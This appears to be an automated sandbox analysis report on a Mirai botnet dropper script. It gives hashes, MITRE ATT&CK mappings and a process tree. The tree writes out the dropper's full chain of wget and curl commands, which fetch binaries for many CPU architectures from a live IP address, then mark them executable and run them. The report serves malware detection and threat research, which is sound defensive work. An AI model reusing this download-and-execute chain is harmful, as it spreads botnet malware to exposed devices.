mirai | f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1

Analysis

max time kernel
34s
max time network
52s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
20-11-2024 00:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8UsA.sh
Size

1KB
MD5

0b5a60057fc9d9ce95ba5cdaab501e68
SHA1

879040e7114865f81dbd3f2fb41409e0cb3b8966
SHA256

f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1
SHA512

d97b13f656458456b934ab1cdc205ec4efedebfa8ee98675ba38865e916563487d1fd5c649afad7376f469a60ecd16b7c502c549ac095d8be234f6d9e876f351

Score

10^/10

mirai antivm botnet defense_evasion discovery

Malware Config

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid process

791 chmod
804 chmod
812 chmod
703 chmod
726 chmod
786 chmod
796 chmod
818 chmod
743 chmod
757 chmod

pid	process
791	chmod
804	chmod
812	chmod
703	chmod
726	chmod
786	chmod
796	chmod
818	chmod
743	chmod
757	chmod

Executes dropped EXE 10 IoCs

Processes:

3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvA

ioc	pid	process
/tmp/3AvA	704	3AvA
/tmp/3AvA	728	3AvA
/tmp/3AvA	744	3AvA
/tmp/3AvA	758	3AvA
/tmp/3AvA	787	3AvA
/tmp/3AvA	792	3AvA
/tmp/3AvA	797	3AvA
/tmp/3AvA	805	3AvA
/tmp/3AvA	813	3AvA
/tmp/3AvA	819	3AvA

Checks CPU configuration 1 TTPs 10 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 20 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

cat3AvAwgetcurl

pid process

724 cat
728 3AvA
707 wget
716 curl

pid	process
724	cat
728	3AvA
707	wget
716	curl

Writes file to tmp directory 20 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetwgetcurlcurlwgetwgetcurlwgetwgetwgetcurlcurlcurlwgetcurlcurlcurl8UsA.shcurlwget

description	ioc	process
File opened for modification	/tmp/IGxModz.arm7	wget
File opened for modification	/tmp/IGxModz.mips	wget
File opened for modification	/tmp/IGxModz.mpsl	curl
File opened for modification	/tmp/IGxModz.arm6	curl
File opened for modification	/tmp/IGxModz.mpsl	wget
File opened for modification	/tmp/IGxModz.arm5	wget
File opened for modification	/tmp/IGxModz.arm5	curl
File opened for modification	/tmp/IGxModz.ppc	wget
File opened for modification	/tmp/IGxModz.m68k	wget
File opened for modification	/tmp/IGxModz.x86	wget
File opened for modification	/tmp/IGxModz.x86	curl
File opened for modification	/tmp/IGxModz.mips	curl
File opened for modification	/tmp/IGxModz.m68k	curl
File opened for modification	/tmp/IGxModz.sh4	wget
File opened for modification	/tmp/IGxModz.arm7	curl
File opened for modification	/tmp/IGxModz.ppc	curl
File opened for modification	/tmp/IGxModz.sh4	curl
File opened for modification	/tmp/3AvA	8UsA.sh
File opened for modification	/tmp/IGxModz.arm4	curl
File opened for modification	/tmp/IGxModz.arm6	wget

/tmp/8UsA.sh
/tmp/8UsA.sh
1⤵
- Writes file to tmp directory
PID:653
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.x86
  2⤵
  - Writes file to tmp directory
  PID:656
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:683
- /bin/cat
  cat IGxModz.x86
  2⤵
  PID:701
- /bin/chmod
  chmod +x 3AvA 8UsA.sh IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I
  2⤵
  - File and Directory Permissions Modification
  PID:703
- /tmp/3AvA
  ./3AvA x86
  2⤵
  - Executes dropped EXE
  PID:704
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:707
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:716
- /bin/cat
  cat IGxModz.mips
  2⤵
  - System Network Configuration Discovery
  PID:724
- /bin/chmod
  chmod +x 3AvA 8UsA.sh IGxModz.mips IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I
  2⤵
  - File and Directory Permissions Modification
  PID:726
- /tmp/3AvA
  ./3AvA mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:728
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.mpsl
  2⤵
  - Writes file to tmp directory
  PID:731
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:740
- /bin/cat
  cat IGxModz.mpsl
  2⤵
  PID:742
- /bin/chmod
  chmod +x 3AvA 8UsA.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I
  2⤵
  - File and Directory Permissions Modification
  PID:743
- /tmp/3AvA
  ./3AvA mpsl
  2⤵
  - Executes dropped EXE
  PID:744
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.arm4
  2⤵
  PID:746
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.arm4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:747
- /bin/cat
  cat IGxModz.arm4
  2⤵
  PID:755
- /bin/chmod
  chmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I
  2⤵
  - File and Directory Permissions Modification
  PID:757
- /tmp/3AvA
  ./3AvA arm4
  2⤵
  - Executes dropped EXE
  PID:758
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.arm5
  2⤵
  - Writes file to tmp directory
  PID:759
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.arm5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:784
- /bin/cat
  cat IGxModz.arm5
  2⤵
  PID:785
- /bin/chmod
  chmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I
  2⤵
  - File and Directory Permissions Modification
  PID:786
- /tmp/3AvA
  ./3AvA arm5
  2⤵
  - Executes dropped EXE
  PID:787
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.arm6
  2⤵
  - Writes file to tmp directory
  PID:788
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.arm6
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:789
- /bin/cat
  cat IGxModz.arm6
  2⤵
  PID:790
- /bin/chmod
  chmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I
  2⤵
  - File and Directory Permissions Modification
  PID:791
- /tmp/3AvA
  ./3AvA arm6
  2⤵
  - Executes dropped EXE
  PID:792
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.arm7
  2⤵
  - Writes file to tmp directory
  PID:793
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.arm7
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:794
- /bin/cat
  cat IGxModz.arm7
  2⤵
  PID:795
- /bin/chmod
  chmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I
  2⤵
  - File and Directory Permissions Modification
  PID:796
- /tmp/3AvA
  ./3AvA arm7
  2⤵
  - Executes dropped EXE
  PID:797
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.ppc
  2⤵
  - Writes file to tmp directory
  PID:798
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.ppc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:799
- /bin/cat
  cat IGxModz.ppc
  2⤵
  PID:803
- /bin/chmod
  chmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86
  2⤵
  - File and Directory Permissions Modification
  PID:804
- /tmp/3AvA
  ./3AvA ppc
  2⤵
  - Executes dropped EXE
  PID:805
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.m68k
  2⤵
  - Writes file to tmp directory
  PID:807
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.m68k
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:808
- /bin/cat
  cat IGxModz.m68k
  2⤵
  PID:811
- /bin/chmod
  chmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86
  2⤵
  - File and Directory Permissions Modification
  PID:812
- /tmp/3AvA
  ./3AvA m68k
  2⤵
  - Executes dropped EXE
  PID:813
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.sh4
  2⤵
  - Writes file to tmp directory
  PID:815
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.sh4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:816
- /bin/cat
  cat IGxModz.sh4
  2⤵
  PID:817
- /bin/chmod
  chmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86
  2⤵
  - File and Directory Permissions Modification
  PID:818
- /tmp/3AvA
  ./3AvA sh4
  2⤵
  - Executes dropped EXE
  PID:819

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/3AvA

Filesize
139KB

MD5
146a0bb5d835cff65a7c8b97ec3145de

SHA1
26569b4ff68b3fc8ed0ca5d17b74a77f159971cd

SHA256
4436f0dd3e6566d029bc495a6035ee2f22c232f6d608370d621d898b2b76d95e

SHA512
5c4f94c060c6e56236f58dec5cdbdad127d0bedf85f76afdd5165d75ec74ee16c54153cb270b1cb0f39c639d0352392d51aa0b25dfef229dea7f892d8e95d13c

Download Submit
/tmp/3AvA

Filesize
132KB

MD5
8a6923c24c3deffaba399ca545c19a45

SHA1
7be6ccbd8be63914c7b1c8a8593829be84d24350

SHA256
bdd82dcb696e7b5f3554f81e2dce89a88a09571ddab8c2c89081511296379d96

SHA512
be86626d2362e5129c6333b8c12040b0d75cce0ecf0e01830abe1b40f43d70fbdd5157df9d709e018ac4381ab6bf7f99b6e1fdb4939e12dbd7da8ab477e7efe1

Download Submit
/tmp/3AvA

Filesize
276B

MD5
960b4fa9d5383373f0a1ea04929df01b

SHA1
f78054d817db7742162a706b5d9f1fedcdf21140

SHA256
3e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a

SHA512
2d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f

Download Submit
/tmp/3AvA

Filesize
49KB

MD5
2f09af4fa574eee01c552daa1631a404

SHA1
a5fc3fdd3979ba7f01cf036ac4001b754ce54cac

SHA256
65a8da0b02c02baf3e5c41028f91f6eaef118a35933e9df21069f599d111c474

SHA512
5484b3960d2353aeeac7d5ccb854dedd28c5c9f6400c4262bbfe49ad11eb69d24436c0cc927fa18be39b2a3ff5ac3e1f89debbbfaa95d46c6b3012ef9476928f

Download Submit
/tmp/3AvA

Filesize
87KB

MD5
9cade77ffa8009fa3a857b37d20646ff

SHA1
fb787ad30a834787722e2f7d0b8a2305c90fa31d

SHA256
9345c1cd7fcbaa1de4691d36d9650f4e9ca833b209eb13a3f0a6602e26cb4517

SHA512
be408bd542d1a117a1d78bd63ef522fb220b63cf66f810ff53b5e4726fed7a822763e395ea97f7a7134e2507f4804e55a1cf02a75f9ebeb0149992c302d0c013

Download Submit
/tmp/IGxModz.x86

Filesize
68KB

MD5
3babcad0786bd3ac084c3ef8bfeaf14f

SHA1
362e7893d9faa99441e51580e36bc1a8499b0020

SHA256
549428f4edfd5acb557015836a7bad388d5f812aa558c388f313a48aef2b480e

SHA512
a503e6f09705a1f204da65a428983c5c46f395d22ea1c559bc1af0d8d19f2cb8eaced4f87e19d688770ee4f1000da6aa75fbf21f877daa475e9617d891d5e45f

Download Submit
memory/798-1-0xb66c7000-0xb66d8044-memory.dmp

Download